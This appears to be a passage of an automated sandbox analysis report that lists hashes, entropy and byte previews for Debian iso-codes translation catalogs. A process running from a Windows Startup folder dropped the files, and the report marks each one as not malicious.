                                                                                                    SHA-256:91F3A5F6964167FAC67428F7B0BCF34745ADD06774118C1EB7D8BBCBBCEEC20F
                                                                                                    SHA-512:63C3AEEF01EAF8A98C11F5E1F6C493DB8741D0DB17350F2563FAAC35C2692120C30F4B39077349277B4F22540D14B6F97A744FDDE7DB1A93F11EEC0E61DFDF05
                                                                                                    Malicious:false
                                                                                                    Preview:................................x.......y...................?...........................................................................%.......-.......7.......C.......P.......Y.......`.......h.......q.......w.......~.......................................................................................:.......B...&...K.......r...........(...........................................................'.......2.......9.......A.......G.......P.......Y.......s...........,...........................................................(.......9.......O...&...f...........4...........................................................#...............B.......V.......\.......c...#...u...............................................................................!.......'.......0.......9.......G.......L.......S.......Z.......c.......m.......................................................................................*...(...4.......].......f.......n...........-...............!...........................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 421 messages, Project-Id-Version: iso_3166-1 'Afghanistan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):23844
                                                                                                    Entropy (8bit):4.998804300836726
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:snboRT6k+bRcVqkp6gzmwZbjh5wsWP4XWAIziUG3UowlOywbgdhVLAMNLCRS:sx2VqWbzmotmsWP4XWAIYqnwcdhVLACD
                                                                                                    MD5:6AF4E2FEAB3283AE9A23C7D001808311
                                                                                                    SHA1:9BA67D6E09660D73435258E97107E68DE8D803C2
                                                                                                    SHA-256:09882ADD8AED6A8A929ACFCA886FA5C36963BF4AEE5AAC6C9BC6AD02C3EF2B29
                                                                                                    SHA-512:08120A6F239ADE5521AA2031FBE1B3211B6A2F550FA1EB7239AF6AD3F50595FC8F32DAF965F239A0C20D97495183E55100772ABFAB7A6DA90D95DD0A48053506
                                                                                                    Malicious:false
                                                                                                    Preview:................D...3...l.......8#......9#......E#......M#......U#......d#......l#......s#......|#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$.......$.......$......&$.......$......5$......;$......C$.. ...J$......k$......s$.. ....$.......$.......$.......$.......$.......$.......%.......%......1%......:%......G%......O%......Z%......c%......l%......s%.......%.......%.......%.......%.......%.......%.......%.......%.......%..,....&......@&......H&..%...N&......t&.......&.......&.......&.......&.......&.......&.......&.......&..%....&..,....&.."..."'..*...E'......p'......x'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......(......#(..'...1(..$...Y(......~(.......(.......(.......(.......(.......).......).......)......#)......1)......B)......R)......n)......t).......).......).......).......).......).......).......).......).......).......).......).......).......).......*.......*.......*.......*......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 61 messages, Project-Id-Version: iso_3166-2 'Ab\305\253 Z\314\247aby'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3047
                                                                                                    Entropy (8bit):5.0118238363502075
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:CPgsFgUUcY04aEe0Y5vizKC4a52HsekazjG/UQDm1kC4a52HsekazjI:CP1aUHtcezFiT5jazjG/BDm1t5jazjI
                                                                                                    MD5:F1ED61F0E0ADC3F1F5AA72068C16AE1A
                                                                                                    SHA1:8470619F62C59883E09DD41D5915F9DC47097BA6
                                                                                                    SHA-256:191A40F7C125ECA00684BAAB631B78704C49F0FD0B387559EAAFF2746CCA5704
                                                                                                    SHA-512:EAAC5612151431D19E77102DDB4B7F31247E58D1993F13CF34851667024D71A1FD7394B9E963C22B720F0CE698DDC55239457A8CBA422379699A6BA0DE950C42
                                                                                                    Malicious:false
                                                                                                    Preview:........=...........S...........8.......9.......E.......Q.......b.......p.......|...............................................................................................................................................................".......+.......5.......<.......D.......K.......R.......\.......g.......p.......w...............................................................................................................................#.......-.......C.......M.......U.......d.......m.......t.......{...............................................................................................................................%.......0.......8.......?.......R.......Y.......^.......g.......o.......u.......}.......................................................................................................................................................$.......6.......>.......K.......V.......a.......l.......x.......................................................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 127 messages, Project-Id-Version: iso_3166-1 'Afganistan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5837
                                                                                                    Entropy (8bit):4.763970699074772
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:kf7RK2VgUmH16QpPcG///dvLC/+Pi8FUMgTuRdewkQyHTLgZ/S5BZwrmdV:SRKVU86QxcS/VK+PtFUMgTAezZHi/u5
                                                                                                    MD5:D17A60F47FC84EF91A5D00EF7C62B230
                                                                                                    SHA1:CF094BC19E390F790189436EA18E8E51F1E609F4
                                                                                                    SHA-256:FE00BDBF74CBB00453DA2DDDF371531E7996BE99A91BD47E59FE0BDDEBE9F9A9
                                                                                                    SHA-512:E9BA63D2B979CAFFF67289B65477BE300C6F4467432067A3F79D193CA056293D68DDCC114D2A3AB1FC5EC345700F72CB75599C098E5D6F9CEA5CD709731FA545
                                                                                                    Malicious:false
                                                                                                    Preview:................................................................................................................$.......*.......4.......<.......G.......R.......Z.......b.......i.......o.......v...............................................................................................................................................................6.......?.......R.......Z.......`.......r.......z...............................................................................................................................................%.......,.......7.......>.......F.......N.......T.......b.......l.......w.......................................................................................................................................%.......*.......6.......=.......C.......K.......R.......h... ...t...............................................................................................................#...............B.......J.......R.......g.......u.......................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 1 message, Project-Id-Version: iso_3166-3
                                                                                                    Category:dropped
                                                                                                    Size (bytes):393
                                                                                                    Entropy (8bit):5.181434556536249
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:ilijWlXYYxA9Ct0vOuvP0NXzffUWKcG/R1iMA2KMiRlF2AF24GPMXmBQ8KMW0YEk:i4Kxxjt02UkLKcG/Ki4FL24oMXmBQWi9
                                                                                                    MD5:014952DC868ED6DD82B17EA8DD8AEB57
                                                                                                    SHA1:1D199C539A8ABA19A896DBC7D39068CFDAD6BC66
                                                                                                    SHA-256:E66614F41514FFB06E712D2271E4065B279A98291C31B233A530B8A2F0D892BF
                                                                                                    SHA-512:321BBF8B4159FA350F42FE47AD298452C5E5A3FDE9917FF58BAC32751F4516C97902669CAE82E3FF2EC179B10ABBFBBADBC7D2BF7B8F83866ED0C02F0C28E877
                                                                                                    Malicious:false
                                                                                                    Preview:................$.......,.......8...O...9................Project-Id-Version: iso_3166-3.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2004-08-08 10:00+0100.Last-Translator: Alastair McKinstry <mckinstry@debian.org>.Language-Team: Faroese.Language: fo.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 183 messages, Project-Id-Version: fr 'Adlam'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10260
                                                                                                    Entropy (8bit):5.098046880408306
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:dcrKx2888FavltU4WjV9qWxa5hWh2/K3BnDmyh/B9vVNgpz5L:7h88Fwg4WjVDxa5hWh2/IDmyJB99SpZ
                                                                                                    MD5:97168E5CD2F4221FAF24E943E9F61BC3
                                                                                                    SHA1:127E8A1A87ADC1470172A9ADC567082B45F0937E
                                                                                                    SHA-256:8ECDF66240ECD9D9A41C8F7F585BCEF5E233270EC9AF47554488B291F06DE4DA
                                                                                                    SHA-512:C2E31EA1E05984FBF3258E4FF2475318CB1E7A25002799F746596EFFE06A1552B055972EC697CDA13FCBC15ACB5BAA558A4EDA7040797297F47C5995AF4BBE5E
                                                                                                    Malicious:false
                                                                                                    Preview:................................x.......y...................?...........................................................................%.......-.......7.......C.......P.......Y.......`.......h.......q.......w.......~.......................................................................................:.......B...&...K.......r...........(...........................................................'.......2.......9.......A.......G.......P.......Y.......s...........,...........................................................(.......9.......O...&...f...........4...........................................................#...............B.......V.......\.......c...#...u...............................................................................!.......'.......0.......9.......G.......L.......S.......Z.......c.......m.......................................................................................*...(...4.......].......f.......n...........-...............!...........................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 426 messages, Project-Id-Version: iso_3166-1 'Afghanistan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):24340
                                                                                                    Entropy (8bit):5.088216234624614
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:F9k3DKSosgEs346nbjz5wsWP48WAINiZGQMWeXXalxbiYZAPq2F+ssd:0oCs348fmsWP48WAI6QIiuAPRF+se
                                                                                                    MD5:4A923BCE0C8021DA97B0A99A742E2533
                                                                                                    SHA1:13CB8204E34EAA038C9F855A3F1F63FA3D2D975A
                                                                                                    SHA-256:D31AAEA143B639A5DB97938F055C3BA82498A950497224D9BE3806D6782C3BE6
                                                                                                    SHA-512:FECA1EFB207B687448278B1AE9111A4C716C94D19DEADC357E06BFDF705CF463166562900AB376B945B29C8768F254D4F44FA565DDEE350A908B3C4FA8792D93
                                                                                                    Malicious:false
                                                                                                    Preview:................l...9............#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$......$$......7$......?$......E$......O$......W$......b$......j$......r$......}$.......$.......$.......$.......$.......$.......$.. ....$.......$.......$.. ....$.......%......3%......<%......J%......Q%......p%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......&.......&.......&.......&......%&......=&......F&......_&..,...{&.......&.......&..%....&.......&.......&.......&.......&.......'.......'.......'...... '......('..%...7'..,...]'.."....'..*....'.......'.......'.......'.......'.......(......!(......)(....../(......;(......M(......U(......](......f(......o(.......(..'....(..$....(.......(.......).......)......:)......Y)......w)......|).......).......).......).......).......).......).......).......).......).......).......*.......*.......*....../*......6*......@*......H*......S*......X*......b*......k*......r*.......*.......*......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 3769 messages, Project-Id-Version: iso_3166-2 ''Eua'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):160680
                                                                                                    Entropy (8bit):5.2452546994283145
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:Et4htCJ3ZX+uV/238Etx6WN/GddUlTEc0hmqDEQOzJtdID3IhQ00b12X:Et4ojatx6goc0sqJgiIhh41E
                                                                                                    MD5:89F2D55A6AF6C72B546574503A647659
                                                                                                    SHA1:8DD68D26F1C7EB37CAB97BC3C835C1BB00DA00C0
                                                                                                    SHA-256:48EBF8D099BF30B1425107AF5BB2EB5C2CF474B6F824BF420465E3AF936D01DE
                                                                                                    SHA-512:8DC18A55CE91DFB8CB073A5170CAA35966F34B26EB69040269C602A6474E3BDB8CB8F84BD8744FAD82C456233E6310F411F519AD14AAAE3F57CB02C7DE54ED7B
                                                                                                    Malicious:false
                                                                                                    Preview:.................u..............h:......i:......n:.......:.......:.......:.......:.......:.......:.......:.......:.......:.......:.......:.......:.......:.......:.......:.......;.......;.......;.......;......';....../;......5;......A;......J;......P;......Z;......i;......p;.......;.......;.......;.......;.......;.......;.......;.......;.......;.......;.......;.......<.......<.......<.......<...... <......&<......,<......1<......D<......K<......X<......^<......d<......l<......v<.......<.......<.......<.......<.......<.......<.......<.......<.......<.......<.......=.......=......1=......==......L=......T=......^=......h=......q=.......=.......=.......=.......=.......=.......=.......=.......=.......=.......=.......>.......>.......>......!>......,>......@>......N>......[>......c>......k>......t>......{>.......>.......>.......>.......>.......>.......>.......>.......>.......>.......>.......>.......>.......>.......?.......?......#?......4?......<?......C?......J?......S?......b?......p?......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 32 messages, Project-Id-Version: 'Territoire britannique de l'Antarctique'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2860
                                                                                                    Entropy (8bit):5.213360407824239
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:rLf3WVLoWFgY+vGqIfdvqN5CWUV/Alkwus5H7HL6sgNp:rLvyLom+yaCW2/A2wTr61Np
                                                                                                    MD5:F1330C084F8A8EFC1EBB2D30E77AE214
                                                                                                    SHA1:158152527480B46B44770C14FF6160076582373E
                                                                                                    SHA-256:FE452A9D28A1D4558033167A2A717BA444C5F6407BDE7C8F1C7512012D092064
                                                                                                    SHA-512:8C7759804AAC085E44D0DBF18144FE96A833837A7EABCADF37B9E7C7E3280E9F8564F326FD6F26C60EDE75ACB0BF1C43D004B6C98FAB6B083D5D79C2E15E3AE7
                                                                                                    Malicious:false
                                                                                                    Preview:........ ...........+.......................).......*...........:.../...W...........................................)...........................9.......I.......X.......m.......z...!....................................... .......)...........5... ...N.......o...2...{...+.......................'...............2...............8...H...................................+.......,.......#...........C.......[.......i.......v...........................................................+.......5...4.......j...&.......................3....................... ....................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 180 messages, Project-Id-Version: iso_4217 'Unit\303\251 de compte de la BAD (Banque africaine de d\303\251veloppement)'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9998
                                                                                                    Entropy (8bit):4.987069281869574
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:fqFT4SfTCO6VRyK0G/2LCntxLupMZ2WttSXfQIPn:SZff6TL0G/Uo/LupUmXn
                                                                                                    MD5:85A287837E659E41A523A7F4E1542CB2
                                                                                                    SHA1:9D0187132B335180AD639DFF31BD1F1B36818933
                                                                                                    SHA-256:C647FCDDCD6AFDF1FE619F8B7F51AF6948CD55A8E10F84151D4A3130DDDBC930
                                                                                                    SHA-512:CC77C841C35B620FCE0C972DCAF261BF238BD111D11CADD7DB93465CF2C26986C61F9434EAAB087C9D8C6720AF328B022D468625F0CCA68051073F35B47F25E8
                                                                                                    Malicious:false
                                                                                                    Preview:........................\....... .......!.......5.......=.......L.......[.......i.......w...........................................................................................1...!...3...S...9.......7...................................$.......2.......B.......Q.......[.......m.......}...........0...................................................................9.......F.......M.......Z.......`.......o.......u...............................................................................................................%.......-.......;.......I.......Z.......b.......p.......}.......................................................................................................................................(.......5.......?.......D.......T.......b.......t...........!...................................................................................1.......D.......V.......i.......r.......................................................................................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 9327 messages, Project-Id-Version: fr ''Are'are'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):418827
                                                                                                    Entropy (8bit):5.283626900962074
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:h/5ebkRB41EoyjlN7FhvOh/IvgKXd3qwYHvio4PpiFEy0bWOaGaG/K6Ekp0y:naIzXv8AZBWHvibBKEy0owTEDy
                                                                                                    MD5:972591CA80602D1E82CF3D75D0729D0E
                                                                                                    SHA1:94017F374FC09F3BACEAE08803C76F059B6DBE0D
                                                                                                    SHA-256:C28273B7DA4CA5AF1CFBABDD9070219A37AFA2CB88BD859AA96BA71271A7DCEE
                                                                                                    SHA-512:550B4E1F2B6540C1DBFBAD2A43B15282204B80E2776075CFC3C20053E30C0B46FE205E71FA9A2258220FFD76443CF7F7296E86FFA39C6329DAE4D413A0CDC357
                                                                                                    Malicious:false
                                                                                                    Preview:........o$.......#...0...G......`.......a.......j.......t.......y............................................................................................................................................................... .......&.......*.......7.......<.......A.......F.......L.......T.......Y.......j.......r.......y.......~.......................................................................................................................................$.......+.......1.......8.......<.......K.......U.......e.......s.......................................................................................................................................................$.......*.......8.......>.......C.......S.......Y.......`.......d.......i.......n.......................................................................................2.......=.......D.......M.......S.......a.......k.......u.......|.......................................................................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 116 messages, Project-Id-Version: iso_639-5 'Afro-asiatiques, langues'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):7943
                                                                                                    Entropy (8bit):4.853571024535874
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:XohhvFk/Dxi2Z+TBBCRSlSE0BfCuXr5VcJHVCj/A2yvwbvIBRQn3dSmoTtQAjrdq:4SDxYSE0BfNcajHbmQn3dsRDkuEeQJ5l
                                                                                                    MD5:9F9BAFB321F5C939874D07E368A2D895
                                                                                                    SHA1:90572B926A0AA1DDE3D3A9E064B832040A0418E9
                                                                                                    SHA-256:C3880AD3DD4A4A967E8798EC1CC50EF2B06A876E42688F830AB18064E04000B5
                                                                                                    SHA-512:027C1CFCECFB086A87E4165DC138BF692FF4F64A08E9F466490AFED3828D4A3E30E570D7D5BDBC4F40967979762B83504213B4C12779FCA376D6EE8411EB93F4
                                                                                                    Malicious:false
                                                                                                    Preview:........t...............\............................................... .......5.......F.......W.......h.......{...............................................................&.......9.......I.......Y.......i.......y...................................!.......#...................2.......C.......T.......g.......x...$.......#.......%...........................".......:...#...P.......t.......................................................................*.......8.......H.......`.......w...............................................................................7.......G.......X.......h.......|...............................................................1.......J.......[.......l...............................................................................'.......9.......P.......a.......r...............................................................(.......9.......H.......Y.......j...........................#...................................................................3.......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 204 messages, Project-Id-Version: iso_3166-1 'Afganistan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9173
                                                                                                    Entropy (8bit):4.835911537223254
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:TcGqxYHNJBHqrATpso0VSMPpT0rjzugbdLCTZzxtkut62:26V3p50VSMPpMnugbdLCT9kV2
                                                                                                    MD5:9FADB30674A661448B3EBD3392D860DB
                                                                                                    SHA1:B10CC8D777C45D0FDC3CD344D37572EA2330B169
                                                                                                    SHA-256:22F8F15C6D16E2D4A1FA5B65C6E84FFA6092FA7521BB44FA0A23CFC3FDB91D61
                                                                                                    SHA-512:773B8BB5F1FC209E6E9238D7246522363BA204968A40C3E7E79F018909C26CB9D23A1F7416876A7B689E09F3D99DDFFE3058EAC6DC90751F6971C2765DDB9B1A
                                                                                                    Malicious:false
                                                                                                    Preview:................|...............0.......1.......=.......E.......M.......\.......d.......k.......................................................................................................................................................%.......<.......E.......R.......Z.......c.......l.......s.......................................................................................................................................'.......-.......9.......K.......S.......\.......j.......................................................................................................................................................%.......3.......:.......@.......I.......Q.......Y......._.......i.......n.......v.......................................................................................................................................................................*.......1.......:.......C.......H.......N.......Y.......d.......n.......u.......}.......................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 426 messages, Project-Id-Version: iso_3166-1 'Afghanistan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):23950
                                                                                                    Entropy (8bit):5.011395728521389
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:F9k3DKSosUeQFxD1F46nbjz5wsWP48WAINiZGVFlTtUbwcmc1PAA647KPn0Zna/:0oSMD1F48fmsWP48WAIGwcLA947c0VA
                                                                                                    MD5:8CB1BD81B49BE7C20E260AC18D099B6E
                                                                                                    SHA1:85FE7A7BC4B3015E95973280D9B096125A386388
                                                                                                    SHA-256:D013F6E647AA75F478C6EB0E15A43C6CA3000D820DA733233899B6FD2CF36EB8
                                                                                                    SHA-512:51AFA51AC105E11FCEF68F3141F03B89093E188B4D5703DD042B9EAC15F9A644FC4ACE633B3F76003048D348F7545E8152445AF02F8364FF4FCA2E5D7E893356
                                                                                                    Malicious:false
                                                                                                    Preview:................l...9............#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$......$$......7$......?$......E$......O$......W$......b$......j$......r$......}$.......$.......$.......$.......$.......$.......$.. ....$.......$.......$.. ....$.......%......3%......<%......J%......Q%......p%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......&.......&.......&.......&......%&......=&......F&......_&..,...{&.......&.......&..%....&.......&.......&.......&.......&.......'.......'.......'...... '......('..%...7'..,...]'.."....'..*....'.......'.......'.......'.......'.......(......!(......)(....../(......;(......M(......U(......](......f(......o(.......(..'....(..$....(.......(.......).......)......:)......Y)......w)......|).......).......).......).......).......).......).......).......).......).......).......*.......*.......*....../*......6*......@*......H*......S*......X*......b*......k*......r*.......*.......*......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 14 messages, Project-Id-Version: iso_3166-3 'Teritori antartic britanic'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1483
                                                                                                    Entropy (8bit):5.16721000485554
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:4ZkJ3NHl/LvhgXBaOEfUWXmikHAjos5t0Ugre4tk/maXmGNdAqPmid+O9Eo:4SJ3NHtLvhR3WsoUgDOOFOB
                                                                                                    MD5:41BB07B0C738CE3AA73C151BE29FCA0E
                                                                                                    SHA1:E3BA844D432175D6A1EBC618CF056FAF2B2529BF
                                                                                                    SHA-256:86F043F9990C484B8DA988D0BD1247E42FF2F859FDF73CBCDA9F1BD91993DF3F
                                                                                                    SHA-512:5F3E4DE7FE700B8174AABCDA0049C844426B05F0CD19544C0F4CC258B263F1D4F1EF7C6EE1E1ADD36F215CC4E9E2F4CA1B186DF9275C9E3B334E34955497A279
                                                                                                    Malicious:false
                                                                                                    Preview:................................H.......I...)...e...*...............................)...................0.......=.......J.......\...+...r...............f...+.......+.......................%...........$.......@.......R.......`.......o...........-....................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.East Timor.France, Metropolitan.French Afars and Issas.French Southern and Antarctic Territories.Netherlands Antilles.Neutral Zone.New Hebrides.Panama Canal Zone.Serbia and Montenegro.Yugoslavia, (Socialist) Federal Republic of.Project-Id-Version: iso_3166-3.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2023-12-21 10:55+0000.Last-Translator: adecorte <adecorte@gmail.com>.Language-Team: Friulian <https://hosted.weblate.org/projects/iso-codes/iso-3166-3/fur/>.Language: fur.MIME-Version: 1.0.Content-Type:
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 8 messages, Project-Id-Version: iso_639-3 'Abaga'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):755
                                                                                                    Entropy (8bit):5.167022126383152
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:i90yrc26U0CXxq7it02UkW/ePqLLrtk/4l5NDV/yXmBQWiOWrS+JCn:u0G/66Vt0U6e4tk/2JaXmGbo
                                                                                                    MD5:1C35597148B54B33696D86B3370A57ED
                                                                                                    SHA1:C36D6CF1F28A39D3CC31B8DE6957E05EBD02ADDF
                                                                                                    SHA-256:EE5744983B1FCC41FBDF97AEBEC2930F119EF3936C7AA0A82E3B2C6977959C9A
                                                                                                    SHA-512:3412A6CDA8DB730B2A35E8F9E6FFB8ACAADCC510C2B4C018FE242F87350144A96B7CC416EF5DB729C1BDFA3559B6359A0F29A2D8BA2CC0C919336886DFE72B3C
                                                                                                    Malicious:false
                                                                                                    Preview:................\........................................................................................................................................................................................Abaga.Abkhazian.Afar.Bankon.Friulian.Manide.Solong.Project-Id-Version: iso_639-3.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2021-12-23 19:27+0000.Last-Translator: adecorte <adecorte@gmail.com>.Language-Team: Friulian <https://hosted.weblate.org/projects/iso-codes/iso-639-3/fur/>.Language: fur.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit.Plural-Forms: nplurals=2; plural=n != 1;.X-Generator: Weblate 4.10.1..Abaga.Abc.s.Afar.Bankon.Furlan.Manide.Solong.
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 116 messages, Project-Id-Version: iso_639-5 'Lenghis afro-asiatichis'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):7791
                                                                                                    Entropy (8bit):4.8255768534676475
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:XohhvFk/Dxi2HzKaZn1RSlSE0BfCuXr5VcJHVC9jwDv+ErRfRl0uIGfULfbv:4SDxp74SE0BfNca9YRfRlh6Lfbv
                                                                                                    MD5:7038BC075A9577A1A5D2B2C6996B76E1
                                                                                                    SHA1:0F82C5C2C5E747F5188AA04E7C02E3BA0A9BD2E6
                                                                                                    SHA-256:3F5AEF4112B2BABE0E0D5ACD1C5093FF7BF8929F02A482CA313B71F701B384AA
                                                                                                    SHA-512:3F99146B4292C764B0083F4795F1916848F5AD616A2CA53DC81455DB2D1B7D718200B9510AF274776DDED2C7E2A6DB24C694FF03FFCEFB7FA4305B86AAC1C62A
                                                                                                    Malicious:false
                                                                                                    Preview:........t...............\............................................... .......5.......F.......W.......h.......{...............................................................&.......9.......I.......Y.......i.......y...................................!.......#...................2.......C.......T.......g.......x...$.......#.......%...........................".......:...#...P.......t.......................................................................*.......8.......H.......`.......w...............................................................................7.......G.......X.......h.......|...............................................................1.......J.......[.......l...............................................................................'.......9.......P.......a.......r...............................................................(.......9.......H.......Y.......j...........................#...........................................................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 209 messages, Project-Id-Version: iso_3166-1 'Afganistan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9356
                                                                                                    Entropy (8bit):4.779475948916438
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:BWHEtq+4hdQPy/Rvwe3yTF2zugHLu4uNvDVet8qvouC:BWEqHd0yZvN3yBWugHLu4uBVemqvoz
                                                                                                    MD5:0327BDC7AD3D796A2C18FCB25BE53F3E
                                                                                                    SHA1:1C005969B7D2A4A073FBDC00F580E602E309B1CA
                                                                                                    SHA-256:298866271FE5107B1D0AE63B65D699B73DA023BE5906467CF3C0DDFDD679A41A
                                                                                                    SHA-512:B33E2FA4C9A8ACB93039BBA621DA664615D6E04CFF545680161C74CE221B12F00081D7F5302C6055B7BDE26AEA17589530D3883501E3FB6CEF48480CC5BFEEA4
                                                                                                    Malicious:false
                                                                                                    Preview:........................,.......................................................................................................................................%.......0.......9.......A.......I.......P.......V.......^.......e.......m....................................................................................................... .......%.......+.......C.......L.......T.......a.......l.......t.......y......................................................................................................................./.......4.......<.......C.......Q.......W......._.......g.......m.......w.......~...................................................................!...................................................................$.......,.......8.......?.......E.......M.......S.......Z.......a.......l.......r.......{.......................................................................................................................................................$.......,.......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 407 messages, Project-Id-Version: iso_3166-1 'An Afganast\303\241in'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):23528
                                                                                                    Entropy (8bit):5.076558370923516
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:Agho/nc0xIJ7vO73DR6Tp0FnOpbV8jq5wsOP4XLAE1i3Kak2rlR01UnsF:ec5G5G08h++msOP4XLAEWnrk1Z
                                                                                                    MD5:0B85F64B96FB4E68E23FC2AF6216E3BF
                                                                                                    SHA1:C99CE0A6234B8D33F75ED93C29CDE0C727F87B3B
                                                                                                    SHA-256:79861DBDBD339EBBA8F5E02F9816E700564C4CD7EF6FCB2F457F79ABE7ECEA78
                                                                                                    SHA-512:1463D1B5ADE4F4E6F8059806AF895DA8C2475855412C420407C1FA0B0AD7D75D6A6475F4015D5B7490814B9D63A18660CA815B956876DB714640A703EF37EEBF
                                                                                                    Malicious:false
                                                                                                    Preview:....................#............"......."......%"......-"......5"......D"......L"......S"......\"......g"......{".......".......".......".......".......".......".......".......".......".......".......".......".......#.......#.......#.......#......##.. ...*#......K#......S#.. ...s#.......#.......#.......#.......#.......#.......#.......#.......$.......$......'$....../$......8$......A$......H$......W$......p$......u$......{$.......$.......$.......$.......$.......$..,....$.......%.......%..%...#%......I%......V%......a%......i%......n%......w%......~%.......%..%....%..,....%.."....%..*....&......=&......E&......N&......W&......j&.......&.......&.......&.......&.......&.......&.......&.......&.......&..'....&..$....'......B'......^'......z'.......'.......'.......'.......'.......'.......'.......'.......'.......(.......(.......(......5(......=(......E(......K(......U(......o(......v(.......(.......(.......(.......(.......(.......(.......(.......(.......(.......(..!....(.......).......)......
